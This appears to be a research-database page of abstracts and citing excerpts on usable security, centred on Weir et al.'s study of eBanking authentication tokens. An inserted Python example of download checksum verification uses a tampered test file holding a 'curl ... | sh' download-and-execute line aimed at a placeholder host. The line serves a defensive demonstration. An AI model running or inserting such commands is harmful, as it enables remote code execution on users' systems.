Article

User perceptions of security, convenience and usability for ebanking authentication tokens

Abstract

This research compared three different two-factor methods of eBanking authentication. Three devices employing incremental security layers in the generation of one-time passcodes (OTPs) were compared in a repeated-measures, controlled experiment with 50 eBanking customers. Attitudes towards usability and usage logs were recorded for each experience. Comparisons of the devices in terms of overall quality, security and convenience as perceived by participants were also recorded. There were significant differences between all three methods in terms of usability measures, perceived quality, convenience and security ratings, with the perceived security ratings following the reverse order to the other measures. Almost two thirds of the participant sample chose the device they perceived as least secure as their preference. Participants were asked to use their preferred method again and tended to find their chosen device more usable. This research illustrates the usability-security trade-off, where convenience, quality and usability are sacrificed when increasing layers of security are required. In their preferences, customers were driven by their attitudes towards usability and convenience rather than their perceptions of security.

... Previous research has examined these issues from the perspective of the password problem as a memory problem (Adams and Sasse, 1999; Gaw and Felten, 2006; Grawemeyer and Johnson, 2011; Nelson and Vu, 2010; Wiedenbeck et al., 2005; Woods and Siponen, 2018; Vu et al., 2007); and from the perspective of the password problem being a security behavior issue like any other security behavior (Crossler et al., 2013; Jenkins et al., 2014; Johnston et al., 2015; Pahnila et al., 2007; Vance et al., 2013; Workman et al., 2008). Through the first stream of research, studies have shown that there is a trade-off not only between memorability and security (Vu et al., 2007), but also between password security and convenience (Bang et al., 2012; Tam et al., 2010; Weir et al., 2009). ...
... Issues with password memorability and forgetting passwords can be an expensive security issue, as well as lead to user inconvenience (Al-Ameen et al., 2015). Users are motivated by, and prioritize minimizing inconvenience over increasing security, and adapt their behavior accordingly (Duggan et al., 2012;Notoatmodjo and Thomborson, 2009;Tam et al., 2010;Weir et al., 2009). Moreover, password policy requirements increase the effort users expend on the password process (Inglesant and Sasse, 2010). ...
... 191). Therefore, more research is needed to examine the trade-off between convenience, memorability, and security (Hoonakker et al., 2009;Weir et al., 2009), when considering ways in which to increase these factors concurrently. ...
Article
Passwords are the most frequently used authentication mechanism. However, due to increased password numbers, there has been an increase in insecure password behaviors (e.g., password reuse). Therefore, new and innovative ways are needed to increase password memorability and security. Typically, users are asked to input their passwords once in order to access the system, and twice to verify the password when they create a new account. But what if users were asked to input their passwords three or four times when they create new accounts? In this study, three groups of participants were asked to verify their passwords once (control group), twice, and three times (two experimental groups). Psychological literature suggests that applying repetition in learning to the password process has significant effects on password memorability. However, previous password research has found a trade-off between password security and memorability, and more recently, user convenience. Our results suggest that verifying passwords three times can increase password memorability from 42% (verifying passwords just once, as with current practice) to 70%. Even increasing the verification to just two times can increase password memorability by 17%. However, we found that increasing the number of verifications did not equate to a decrease in user convenience. What this means is that small changes to the password verification stage can have significant results on password memorability while not necessarily inconveniencing the user. The implications of these results could ultimately have a positive effect on password security and the consequences of forgetting passwords.
... Therefore, it is important to know the factors that impact the perceived usability and the perceived security of the authentication methods in online mobile banking before the deployment of a method for broader practice. However, there are few studies that focus on these underlying factors, and they were often conducted on small or student samples that limit the generalization to the wider population (e.g., Weir et al., 2009; Krol et al., 2015; Reese et al., 2019). To overcome this limitation, we collected data from two independent samples of smartphone users that together cover users aged 26 to 82. ...
... Most of them analysed token-based authentication that compared OTP tokens with a display and a button to standard password-based authentication or a card-reader method. Weir et al. (2009) conducted a user study of online banking customers where participants evaluated three two-factor authentication methods (for login and transactions) in terms of usability, security, convenience, and preference. They found the push-button token to be the most usable method, but, at the same time, the participants perceived it to be the least secure. ...
... However, the authors did not provide details about this difference or the specific scores. On the other hand, Weir et al. (2009), who evaluated three two-factor authentication methods for online banking, did not find any statistically significant difference in the security evaluation between men and women. ...
Article
Smartphone authentication is becoming a cornerstone security component, so it is necessary to have methods that are usable and secure to ensure adequate protection, especially for mobile banking. Though biometric authentication seems to be perceived as very usable by users, there is a lack of research to compare smartphone-based fingerprint verification to other authentication methods for mobile banking in terms of usability and perceived security. Using two independent samples, we conducted a study for a younger group aged 26-54 (N = 229) and an older group aged 55+ (N = 239) about their perceptions of the usability and security of four authentication methods: fingerprint, PIN, token, and card reader. All four methods were evaluated positively for both usability and security, with fingerprint verification evaluated as the most usable and the most secure method for mobile banking. Interestingly, none of our hypothesized predictors (i.e., age, gender, education, smartphone self-efficacy, smartphone security behaviour, knowledge of secure smartphone behaviour) was consistently related to how users perceive the usability and security of the examined methods. This suggests that smartphone users would be able to successfully adopt, and be quite satisfied with, any of the tested methods, regardless of demography or smartphone skills.
... To ease the burden on the user and make tools more user-friendly, researchers have studied usability [5,13], yet despite considerable research on the usability characteristics of various tools [8,15], the issue of incorporating usability characteristics seems to be of low priority for designers and providers of such tools. Furthermore, while several studies analyse different usability characteristics that can influence users towards adopting security tools [1,2,5,6,7,10], users' perspectives and their expectations are scarcely addressed. Thus, related research identifies that further research is needed regarding "usable security" and "usable privacy", especially focusing on the user's perspective [4]. ...
... A limited stream of research studies users' attitudes and perceptions regarding the usability of technologies such as e-banking authentication systems, email authentication services, antispyware and encryption tools. Weir et al., asked users to use three different e-banking authentication mechanisms to measure their effectiveness, efficiency and satisfaction [6], concluding that users have different usability preferences for different mechanisms, e.g. users preferred the more efficient push button token (requiring fewer steps for authentication compared to the other two mechanisms), but regarded chip and PIN-Secured tokens as more secure. ...
... In another study where the usability of Tor interfaces was examined, understandability was described as users being aware of the tasks they must perform [12]. In Weir et al. [6], this usability characteristic was defined as know what to do next, with a slightly different meaning, referring in this case to the degree to which users knew how to generate the random number from the e-banking authentication mechanisms and apply it on the website for authentication. Efficiency problems are also reported by Herath et al. [10], who introduced responsiveness as a usability characteristic related to how much time the system takes to respond. ...
Conference Paper
Full-text available
Use of security and privacy tools is still limited for various reasons, including usability issues. This paper analyses usability characteristics of security and privacy tools by drawing on relevant literature and employing scenario-based questionnaires and interviews with 150 users to capture their views. Based on users’ feedback, we analyse the role of usability characteristics and identify critical issues such as transparency, control of personal data, design and accessibility and consistency. This paper provides insights into the multifaceted issue of usability of security tools from the users’ perspective and a comprehensive picture of users’ needs and expectations. Some of the findings of this study show that users regard as important that security and privacy tools incorporate usability characteristics relevant to installation, design and accessibility, control and automation, visible feedback, and locatable security settings. Furthermore, users encounter problems with understanding technical terms and report that the availability of tools among smartphones and operating systems is a usability issue.
... Thus, usability issues lead to a low adoption rate [5,32]. More specifically, users perceive the duration of the current two-factor authentication procedures as too long [49] and they criticize the usage of non-personalized devices [48]. ...
... It has been shown that users prefer or choose devices that they already own over additional physical tokens [48]. Users also tend to choose devices for two-factor authentication based on their usability [49]. Ease-of-use, trustworthiness and the required cognitive effort were found as key aspects for defining the usability of two-factor authentication [13]. ...
... A high level of usability has several benefits for users, such as a reduced error rate, minimized training requirements, improved acceptance and increased efficiency and productivity (Bevan et al., 2005) and has a strong impact on users with specific needs (Kartakis and Stephanidis, 2010). Also, on the basis of two different research studies of eBanking conducted by Weir et al. (2009, 2010), it can be concluded that increased usability leads to poorer security and vice versa. Furthermore, a high level of usability is related to complexity. ...
... Convenience is also an important factor in all commercial systems. Its importance is especially emphasized in eBanking services, where convenience has a higher priority than security (Centeno, 2004; Lichtenstein and Williamson, 2006; Weir et al., 2009). This factor is one of the principal motivations underlying users' inclination to use a certain mobile authentication method. ...
Article
The trend of rapid evolutionary development of mobile technologies and the existence of different user priorities are creating new challenges with regard to the selection of multifactor authentication (MFA) solutions. This becomes even more challenging when creating a universal authentication framework (UAF). In order to cope with these challenges, this paper proposes a Fishbone model, developed in the form of a UAF, which is based on a larger number of linguistic variables and a wider set of user priorities, namely security, usability, accessibility, pricing, complexity, privacy and convenience (SUAPCPC). In comparison to all other papers available in the literature, the Fishbone model provides a numerical evaluation of MFA with the possibility of changing the weighted criteria for the selected user priorities. In addition, the contributions of this model are twofold: for users, to enable an easier choice of MFA solution; for developers, to identify spots where a method or solution could be improved. For development of the Fishbone model, fuzzy methodology is used in the form of a Fuzzy Expert System (FES) tool. The block diagram and the basic modules of the Fishbone model architecture are also given. The results of implementing the Fishbone model in the form of a UAF have shown that this model is applicable and very efficient in practice. Finally, the Fishbone model gives an ideal template within a UAF in which user priorities are matched to the best individual user solutions. The realization of this template presents a challenge for all future developers of MFA solutions.
... A number of studies [6,21,41] have applied those measures to analyze MFA protocols and, in general, solutions for digital authentication. For instance, Weir et al. [41] applied them for the analysis of two-factor authentication protocols where effectiveness was assessed by checking task completion records and usage of help, efficiency by counting the time needed to complete the authentication process and satisfaction by questioning users immediately after they authenticated. The same usability metrics were used in [21], where a broader scope of MFA protocols was investigated. ...
Article
Full-text available
In recent years, the usage of online banking services has considerably increased. To protect the sensitive resources managed by these services against attackers, banks have started adopting Multi-Factor Authentication (MFA). To date, a variety of MFA solutions have been implemented by banks, leveraging different designs and features and providing a non-homogeneous level of security and user experience. Public and private authorities have defined laws and guidelines to guide the design of more secure and usable MFA solutions, but their influence on existing MFA implementations remains unclear. In this work, we present a latitudinal study on the adoption of MFA and the design choices made by banks operating in different countries. In particular, we evaluate the MFA solutions currently adopted in the banking sector in terms of (i) compliance with laws and best practices, (ii) robustness against attacks and (iii) complexity. We also investigate possible correlations between these criteria. Based on this study, we identify a number of lessons learned and open challenges.
... This paper helps to close the gap in the limited existing 2FA usability literature, which examined only the login process, often did not directly observe participants or use ISO 9241-11 suggested measurements, and studied systems that were less widespread and popular than applications such as Google and Facebook (Cristofare, Freudiger, & Norcie, 2013; Weir, Douglas, Carruthers, & Jack, 2009; Gunson, Marshall, Morton, & Jack, 2011). ...
Article
Computer security experts recommend that people use two-factor authentication (2FA) on password-protected systems to help keep hackers out. Providing two pieces of information to verify a person's identity adds extra security to an account. However, it is not clear if the added security and procedures impact system usability. This paper aims to answer this question by assessing, per ISO 9241-11's suggested measurements, the usability of Google's optional 2FA methods. We found few differences across four different 2FA methods when comparing efficiency, effectiveness and satisfaction measures, illustrating that one method is not necessarily more or less usable than another. Overall, the measures indicated that the systems' usability needed to be improved, especially with regard to the initial setup of 2FA. In conclusion, developers need to focus more attention on making 2FA easier and faster to use, especially since it is often optional for password users, yet makes accounts significantly more secure.
... When looking at what motivates users to act on or ignore security warnings and advice, several studies point out that the most important factors are the perceived security/convenience trade-off and the perceived risk of pursuing potentially dangerous actions [20,43,51]. For instance, Fagan and Khan [20] show that most users who follow security advice do so for security benefits, whereas those who do not follow it do so to avoid an inconvenience, mostly related to a lack of time. ...
Conference Paper
Full-text available
Internet users can download software for their computers from app stores (e.g., Mac App Store and Windows Store) or from other sources, such as the developers' websites. Most Internet users in the US rely on the latter, according to our representative study, which makes them directly responsible for the content they download. To enable users to detect if the downloaded files have been corrupted, developers can publish a checksum together with the link to the program file; users can then manually verify that the checksum matches the one they obtain from the downloaded file. In this paper, we assess the prevalence of such behavior among the general Internet population in the US (N=2,000), and we develop easy-to-use tools for users and developers to automate both the process of checksum verification and generation. Specifically, we propose an extension to the recent W3C specification for sub-resource integrity in order to provide integrity protection for download links. Also, we develop an extension for the popular Chrome browser that computes and verifies checksums of downloaded files automatically, and an extension for the WordPress CMS that developers can use to easily attach checksums to their remote content. Our in situ experiments with 40 participants demonstrate the usability and effectiveness issues of checksum verification, and show user desirability for our extension.
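The mechanism this abstract describes, a published digest compared against the digest of the downloaded bytes, can be shown with the W3C SRI integrity format that the paper proposes extending to download links. The following Python is an added example, not the authors' browser or WordPress extension; the sample file, its tampered variant and the fail-closed choice for an integrity value with no usable algorithm are assumptions made for the illustration. It follows the SRI rule that when several digests are listed, only the strongest algorithm present is consulted, and any listed digest for that algorithm may match.

```python
import base64
import hashlib
import hmac

# Algorithms SRI defines, with an ordering so the strongest one wins.
SRI_ALGORITHMS = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}

# Constructed stand-in for a downloaded installer; not a real file.
SAMPLE_FILE = b"#!/bin/sh\necho installer v1.0\n"


def sri_digest(alg: str, data: bytes) -> str:
    """Produce the 'alg-base64digest' string a developer would publish next to a download link."""
    return alg + "-" + base64.b64encode(SRI_ALGORITHMS[alg](data).digest()).decode("ascii")


def parse_integrity(value: str) -> dict:
    """Parse a space-separated integrity attribute into {alg: [digest, ...]}.
    Tokens with an unknown algorithm are ignored, as the SRI spec requires;
    option suffixes after '?' are stripped."""
    parsed = {}
    for token in value.split():
        alg, sep, rest = token.partition("-")
        if not sep or alg not in SRI_ALGORITHMS:
            continue
        parsed.setdefault(alg, []).append(rest.split("?", 1)[0])
    return parsed


def verify_download(data: bytes, integrity: str) -> bool:
    """Return True only if the data matches a published digest for the strongest listed algorithm."""
    parsed = parse_integrity(integrity)
    if not parsed:
        # Design choice for downloads: nothing verifiable means reject, rather than
        # SRI's behaviour for <script> of loading an unverified resource.
        return False
    strongest = max(parsed, key=STRENGTH.get)
    actual = base64.b64encode(SRI_ALGORITHMS[strongest](data).digest()).decode("ascii")
    return any(hmac.compare_digest(actual, expected) for expected in parsed[strongest])


def demo() -> dict:
    """Exercise the normal case, a tampered file, the strongest-wins rule and an unusable value."""
    published = sri_digest("sha256", SAMPLE_FILE)
    tampered = SAMPLE_FILE.replace(b"v1.0", b"v1.0; curl http://example.invalid | sh")
    mixed = sri_digest("sha256", tampered) + " " + sri_digest("sha512", SAMPLE_FILE)
    return {
        "ok": verify_download(SAMPLE_FILE, published),
        "tampered": verify_download(tampered, published),
        # sha512 is the strongest listed, and it matches; the stale sha256 entry is not consulted.
        "strongest_wins": verify_download(SAMPLE_FILE, mixed),
        "unknown_alg_only": verify_download(SAMPLE_FILE, "md5-bm90IGFuIHNyaSBhbGc="),
    }


if __name__ == "__main__":
    print(sri_digest("sha256", SAMPLE_FILE))
    print(demo())
```

A mismatch says only that the bytes differ from what the developer published; if the attacker can edit the page that carries the digest as well as the file, both will agree, which is why the paper ties the digest to the link markup served by the developer's own site rather than to a separate page the user must find.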
... A growing number of sites promote the use of multi-factor authentication tools to remove passwords as a single fail point for accessing accounts, yet most implementations suffer from their own issues with usability and still require the use of passwords as one factor regardless of whether they use biometrics [35], one time codes [10,21,46], or hardware tokens [20,32,45,9]. ...
Conference Paper
Full-text available
Passwords are the primary, most widely used single sign-on and multiple point authentication scheme adopted across the globe. Yet password policies vary greatly and there is little empirical research on how these policies impinge on reuse. For our research, we studied the password policies of twenty-two universities and analyzed 1.3 billion email addresses and passwords obtained from Exploit.in and Anti-Public combination lists. We analyzed the potential for reuse by the students, staff, faculty, and other associated users for each of the universities' domains by checking whether the exposed credentials meet the specific requirements of each password policy. Through our analysis, we found several policy decisions adopted by educational institutions that may decrease security related to account credentials, and we make actionable recommendations for addressing these risks. Our goal is to mitigate the reuse of passwords by implementing updated policies to decrease the probability of credential exposure by a third party. Our recommendations can be generalized to improve the policies employed by any password-using organization, especially for accounts that are deemed to be highly valued, e.g. email providers, banks, or medical portals.
... Frequently, usability measurements are related with easiness of use and enjoyment [50]. Nevertheless, convenience, which is a usability concept, is rarely studied [51], particularly in the domain of TUIs [34]. Convenience is described as the degree to which using an interface is comfortable without excessive physical or mental effort and is connected with the easiness of use [52]. ...
Article
This study applies a mixed methods approach to analyze usability, collaboration, and playfulness aspects in introductory programming activities with tangible and graphical user interfaces of two groups of students (24 primary-school pupils, 8–9 years old; and 14 high-school pupils, 12–13 years old). The students had prior experience with the two interfaces, having used them in a previous study a year earlier. In the present work, students started programming in dyads and used both interfaces (graphical and tangible) once again, but without scaffolding and user instructions. Initially, the students carried out programming tasks and then they were allowed to freely interact with the system and develop their programs in order to explore programming concepts on their own. Quantitative and qualitative analysis were based on the Fun Toolkit survey, interviews, computer logs, and video records. Usability analysis focused on retention, error rate, and convenience and showed that although no difference between the two interfaces was recorded, students' perceived impression of retention was in favor of the tangible interface. Moreover, interaction with the tangible interface was perceived as more playful by all students and more appropriate for collaborative work by older students and girls. Finally, gender effects regarding students' preferences, mostly on the graphical interface, were recorded and analyzed.
... Second, educating users by taking an approach where security communication is designed in such a way that it incorporates susceptibility, benefits and self-efficacy content could further increase protective security behavior. Many users with high self-efficacy may often not be motivated to behave in a compliant way, as they could argue that security is not their concern but the concern of the organization [85]. Clearly, users often delegate security to their organizations, which are expected to take appropriate security measures [45]. ...
Chapter
Full-text available
This study is set out to examine the determinants that drive preventive/protective as well as abusive behaviors among employees in the context of information security by extending the health belief model - a model set out to explain and predict healthy behaviors in human beings. A field experiment, accompanied by online surveys in two financial organizations in the US and India is conducted, measuring employees’ actual security behaviors. We identified factors (perceived susceptibility, perceived barriers, and self-efficacy) that have the largest effect on employee’s security behaviors. We offer several theoretical contributions and implications for practice.
... However, tokens have traditionally relied on special-purpose hardware and consequently been more expensive to implement and deploy than other factors. In addition, usability benefits of tokens have traditionally been offset by the costs of having to carry and handle the tokens [22,29]. ...
Conference Paper
This paper introduces and evaluates collaborative authentication, or coauthentication, a single-factor technique in which multiple registered devices work together to authenticate a user. Coauthentication provides security benefits similar to those of multi-factor techniques, such as mitigating theft of any one authentication secret, without some of the inconveniences of multi-factor techniques, such as having to enter passwords or biometrics. Coauthentication provides additional security benefits, including: preventing phishing, replay, and man-in-the-middle attacks; basing authentications on high-entropy secrets that can be generated and updated automatically; and availability protections against, for example, device misplacement and denial-of-service attacks. Coauthentication is amenable to many applications, including m-out-of-n, continuous, group, shared-device, and anonymous authentications. The principal security properties of coauthentication have been formally verified in ProVerif, and implementations have performed efficiently compared to password-based authentication.
... Before the internet, a security problem would affect only a small number of computers, while the spreading rate was quite slow (Botha et al. 2009). Nowadays any security problem affects a large number of computers that are connected and the spread rate is very fast (Weir et al. 2009). As a result, more and more attention is paid to security since a lot of private and sensitive data are available in the internet (Zhao et al. 2008). ...
Article
Full-text available
Security is coming more and more into the spotlight of today's news. Several reasons have led to this, such as the maturity of computer technology, which gave more people access to computer systems, and the evolution of the internet and computer networking in general. Security, like most technology issues, does not evolve in general directions but follows the direction of technology innovation. This focused direction of security research creates a number of different trends that evolve over time. This study will focus on the trends that have been emerging lately and the implications they have for security management. Suggestions will be proposed in order to accommodate the forthcoming changes.
... SAFEST is a smart and secure FTP application with a client/server architecture. It can provide users with secure transfer of data and a strong authentication protocol [4] [7] [20] [21]. Secure transfer means that the transferred data are encrypted, come from an authorized person (signed with a digital signature), and are stored encrypted on the server. ...
Conference Paper
Full-text available
Nowadays, with the wide application of distributed systems, web-based applications, and communication systems over the Internet for carrying data between users, such as a terminal client and a computer/server, or communication between different devices over a computer network, network security has become a crucial requirement to ensure that received data are authentic during transmission. Authentication and encryption are basic procedures to ensure secure communication over a public network, given the need for tamper resistance and the convenience of dealing with a password file. Most of the protocols used by Internet applications, such as HTTP, FTP, and SMTP, use text streams that are increasingly vulnerable to attack. Encryption represents the main security for most computer applications. This work proposes enhanced secure actions for transferring data using the FTP protocol by using a smart token. A smart token has the capabilities of a smart card, but is more secure and offers some additional operations. A practical and secure user scheme, based on a smart token device, is proposed. A secure platform has been developed using implemented APIs and PKCS#11 as the RSA standard interface. The proposed API is called SAFEST (Secure Actions for FTP Environment with Smart Token). The SAFEST API wraps a standard protocol for implementing the communication between a token and the application using it. This API is platform-independent, scalable to support more functionality, optimizes token usage and adds more security for accessing token objects. The smart token can process the cryptographic key operations on its own rather than on the host computer, which supports high-level platform independence. In addition, through the proposed SAFEST API, standard interfacing to such token devices from any vendor can be implemented using the PKCS#11 interfaces developed by RSA Labs.
... Guaranteeing secure and reliable transactions over untrusted channels is a classical branch of research in security. Traditional approaches to establishing trust between front-end terminals and remote servers leverage (i) challenge-based proof-of-identity schemes (such as Bank of America's SiteKey [9,10]); (ii) additional personal devices (including mobile phones) [11,12,13], possibly enriched with (iii) biometric measurements [14]. Again, the trade-off between usability and security is still a matter of major concern [16,17,18]. Unskilled people may not be able to deal with such devices, while in certain application scenarios (e.g., rural areas), personal devices might not be available. ...
Chapter
Nowadays, plenty of digital services are provided to citizens by means of terminals located in public unguarded places. In order to access the desired service, users authenticate themselves by providing their credentials through such terminals. This approach opens up the problem of fraudulent devices that could be installed in place of regular terminals to capture users' confidential information. Indeed, despite the development of increasingly secure systems aiming at guaranteeing an acceptable security level, users are frequently unable to distinguish between terminals on which security measures are enforced (trusted terminals) and malicious terminals that pretend to be trusted.
... One of the issues is usability while trying to achieve a higher level of security. Many user authentication system designs are tilted more toward the security aspect, but users are driven more toward convenience and usability of the mobile device security mechanism (Weir et al., 2009). There should be a convenient level of trade-off between usability and security in the design of a convenient user authentication system (Schultz et al., 2001; Dourish and Redmiles, 2002; Braz et al., 2007). ...
Thesis
Full-text available
There has been tremendous growth of mobile devices, which includes mobile phones, tablets etc., in recent years. The use of mobile phones is more prevalent due to their increasing functionality and capacity. Most of the mobile phones available now are smart phones with better processing capability, hence their deployment for processing large volumes of information. The information contained in these smart phones needs to be protected against unauthorised persons getting hold of personal data. To verify a legitimate user before accessing the phone information, the user authentication mechanism should be robust enough to meet present security challenges. The present approach for user authentication is cumbersome and fails to consider the human factor. The point-of-entry mechanism is intrusive, forcing users to authenticate always, irrespective of the time interval. The use of biometrics is identified as a more reliable method for implementing transparent and non-intrusive user authentication. Transparent authentication using biometrics provides the opportunity for more convenient and secure authentication over secret-knowledge or token-based approaches. The ability to apply biometrics in a transparent manner improves authentication security by providing a reliable way for smart phone user authentication. As such, research is required to investigate new modalities that would easily operate within the constraints of a continuous and transparent authentication system. This thesis explores the use of bioelectrical signals and contextual information for a non-intrusive approach to authenticating a user of a mobile device. From fusion of bioelectrical signals and context awareness information, three algorithms were created to discriminate subjects with overall Equal Error Rates (EER) of 3.4%, 2.04% and 0.27% respectively. Based on the analysis from the multi-algorithm implementation, a novel architecture is proposed using a multi-algorithm biometric authentication system for authenticating a user of a smart phone. The framework is designed to be continuous and transparent, with the application of advanced intelligence to further improve the authentication result. The proposed framework removes the inconvenience of password/passphrase memorability, carrying a token or capturing a biometric sample in an intrusive manner. The framework is evaluated through simulation with the application of a voting scheme. The simulation of the voting scheme using majority voting improved the performance of the combined algorithm (security level 2) to an FRR of 22% and FAR of 0%, the Active algorithm (security level 2) to an FRR of 14.33% and FAR of 0%, and the Non-active algorithm (security level 3) to an FRR of 10.33% and FAR of 0%.
... While the security offered by TFA techniques is undoubtedly higher than traditional mechanisms based on credentials only, its adoption, optional in most of the cases, is still not diffused. Indeed, most users still prefer the single authentication shot, mainly because of the extra effort required by legacy TFA techniques, always requiring explicit user interactions and not suitable for blind or visually impaired users [51], [52]. These drawbacks have motivated significant efforts in the last years, both by industries and academia, to develop more usable TFA schemes, eventually requiring zero interactions from the user. ...
Preprint
Full-text available
Short-range audio channels have a few distinguishing characteristics: ease of use, low deployment costs, and easy to tune frequencies, to cite a few. Moreover, thanks to their seamless adaptability to the security context, many techniques and tools based on audio signals have been recently proposed. However, while the most promising solutions are turning into valuable commercial products, acoustic channels are increasingly used also to launch attacks against systems and devices, leading to security concerns that could thwart their adoption. To provide a rigorous, scientific, security-oriented review of the field, in this paper we survey and classify methods, applications, and use-cases rooted on short-range audio channels for the provisioning of security services---including Two-Factor Authentication techniques, pairing solutions, device authorization strategies, defense methodologies, and attack schemes. Moreover, we also point out the strengths and weaknesses deriving from the use of short-range audio channels. Finally, we provide open research issues in the context of short-range audio channels security, calling for contributions from both academia and industry.
... Thus, it is authenticated.[1] While the security offered by TFA techniques is undoubtedly higher than traditional mechanisms based on credentials only, its adoption, optional in most of the cases, is still not diffused. Indeed, most users still prefer the single authentication shot, mainly because of the extra effort required by legacy TFA techniques, always requiring explicit user interactions and not suitable for blind or visually impaired users [52], [53]. These drawbacks have motivated significant efforts in the last years, both by industries and academia, to develop more usable TFA schemes, eventually requiring zero interactions from the user. ...
[1] https://en.wikipedia.org/wiki/List_of_data_breaches
Article
Full-text available
Short-range audio channels have appealing distinguishing characteristics: ease of use, low deployment costs, and easy to tune frequencies, to cite a few. Moreover, thanks to their seamless adaptability to the security context, many techniques and tools based on audio signals have been recently proposed. However, while the most promising solutions are turning into valuable commercial products, acoustic channels are also increasingly used to launch attacks against systems and devices, leading to security concerns that could thwart their adoption. To provide a rigorous, scientific, security-oriented review of the field, in this paper we survey and classify methods, applications, and use-cases rooted on short-range audio channels for the provisioning of security services—including Two-Factor Authentication techniques, pairing solutions, device authorization strategies, defense methodologies, and attack schemes. Moreover, we also point out the strengths and weaknesses deriving from the use of short-range audio channels. Finally, we provide open research issues in the context of short-range audio channels security, calling for contributions from both academia and industry.
... Another study found a more complex interaction between perceptions of usability, convenience, quality, and security across three different 2FA devices for online banking authentication. Most participants chose their preferred 2FA device based on perceptions of usability rather than security [29]. A small ethnographic study on smart card usage at a U.S. federal research institute reported similar results [20]. ...
Conference Paper
Despite the additional protection it affords, two-factor authentication (2FA) adoption reportedly remains low. To better understand 2FA adoption and its barriers, we observed the deployment of a 2FA system at Carnegie Mellon University (CMU). We explore user behaviors and opinions around adoption, surrounding a mandatory adoption deadline. Our results show that (a) 2FA adopters found it annoying, but fairly easy to use, and believed it made their accounts more secure; (b) experience with CMU Duo often led to positive perceptions, sometimes translating into 2FA adoption for other accounts; and, (c) the differences between users required to adopt 2FA and those who adopted voluntarily are smaller than expected. We also explore the relationship between different usage patterns and perceived usability, and identify user misconceptions, insecure practices, and design issues. We conclude with recommendations for large-scale 2FA deployments to maximize adoption, focusing on implementation design, use of adoption mandates, and strategic messaging.
... TAM is found to have sufficient explanatory power and the researcher can add more factors or moderators to improve it (Sun & Zhang, 2006). The current study model expands the TAM model and scope of the MBS adoption decision by combining five external latent variables such as perceived risk from perceived risk theory, Binioris, & Polychronopoulos, 2012; Law, 2007; Weir, Douglas, Carruthers, & Jack, 2009), privacy (Chen, 2013; Law, 2007; Mukhtar, 2015), and website usability (Aboobucker & Bao, 2018; Casaló, Flavián, & Guinaliu, 2008; Hasbullah et al., 2016). However, the researchers in all these studies have concentrated on the factors which hinder MBS usage; no past studies have examined subjective norms, trust, risk, privacy, and website usability in one model together with an average impact that greatly inhibits the usage of MBS. ...
Article
Full-text available
Purpose The main objective of this study is to expand the technology acceptance model (TAM) by examining the factors affecting the adoption of mobile banking services by the customers of Palestinian banks and to design a comprehensive model based on TAM and TPB and additional constructs. Design/methodology/approach This study used the quantitative approach with a cross-sectional research design and a questionnaire as a data tool. From the six big cities in Palestine, we surveyed 1000 banking consumers. The samples include different characteristics. For construct relationship analysis this study applied partial least squares (PLS). Findings The study framework provides a complete view of mobile banking services. This framework takes into consideration more determinants for prediction than other studies on the adoption of innovations. The results of using this model managed to explain nearly 77.4 percent of the variation in the dependent variable (intention to adopt mobile banking service). This is a much greater value than those of the previous studies. Moreover, this study found that perceived risk has a negative effect on consumers' intention to use mobile banking services. Attitude, facilitating conditions, perceived ease of use, website usability, and perceived trust were identified as the important variables that have a significant positive effect on consumers' intention to use mobile banking services in Palestine. Originality/value The findings can be used by financial institutions and banks to enhance the usage rate of consumers' adoption and to develop their strategies. JEL classification: B30, B31, B32
... In contrast, its monetary tokenization serves as a security measure to safeguard from unauthorized breaches. While studies seem to suggest that perceived convenience contributes to mobile payment adoption and perceived security requires further investigation (Lai et al., 2019;Weir, Douglas, Carruthers, & Jack, 2009), Burmeister (2015) stressed the importance of security over convenience. Still, little is known whether perceived convenience and perceived security should co-exist for mobile payment adoption or would be a trade-off with an inverse relationship. ...
Article
Full-text available
Integrating gamification into mobile payment platform incentivizes people to use digital alternatives for payment and could spur user-centric, platform-mediated interactions. This study examines the relationship between perceived convenience and perceived security on individual users’ intention to use a gamified mobile payment platform in Malaysia; a developing country envisioned to build a cashless society. The partial least square structural equation modeling (PLS-SEM) technique is employed on a final sample of 388 online users. The results show that perceived convenience has a strong but indirect effect on the intention to use. Perceived security has a strong and direct effect on intention to use and mediates the relationship between perceived convenience and intention to use. Furthermore, the reliability aspect of security is a top priority concern for users interested in using mobile payment. The multi-functional aspect of convenience is a top priority concern to attract users who are not interested in using mobile payment at first. The study discusses theoretical and practical implications for developing a dual strategy of ‘ensuring convenience’ and ‘assuring security’ to encourage the gamified mobile payment platform adoption in developing countries.
... Some of these studies deal with the effect of perceptual design features on perceived security. For instance, using different tokens for eBanking authentication, Weir et al. (2009) have found that the perceived security levels were rated as the highest for the PIN-secured token and lowest for push-button token. In the same way, visual features (e.g., color, layout of computer interfaces, and type of materials) affect the perception of trustworthiness in e-commerce (Kim & Moon, 1998). ...
Article
The feeling of security in your own home is given both by the minimization of the real risk of infringement and by the conditions for minimizing the psychological threats experienced by the user. This study investigates the impact of visual design factors on the perceived security of security doors. Experiment 1 verified the effect of different security door models on perceived security. For each model, participants indicated the perceived security on a 7-point rating scale. In the second experiment, 308 naïve participants estimated the perceived security of the security doors with ten morphological modifications (asymmetry; curved edges; reduced colorfulness; rhomboid panels; relief mullions; nails; engraved texture; electronic lock; double lock; bronze door handle). The influence of visual design factors on perceived security was confirmed in experiment 1. The results also show that asymmetry, nails and an electronic lock increase perceived security significantly. Finally, the findings in relation to the design of security doors are discussed.
... MFA does solve this problem to a greater extent, but it also has a downside in terms of user inconvenience and time taken to log in. In MFA, users are asked to provide additional details in terms of one-time-password, security question, etc. during login which takes extra time to login and that in turn causes inconvenience to the end-user (Weir et al., 2009). With AI-enabled authentication, such problems could be avoided, thereby improving users' overall experience and bringing efficiency in service delivery of RPs. ...
Article
Full-text available
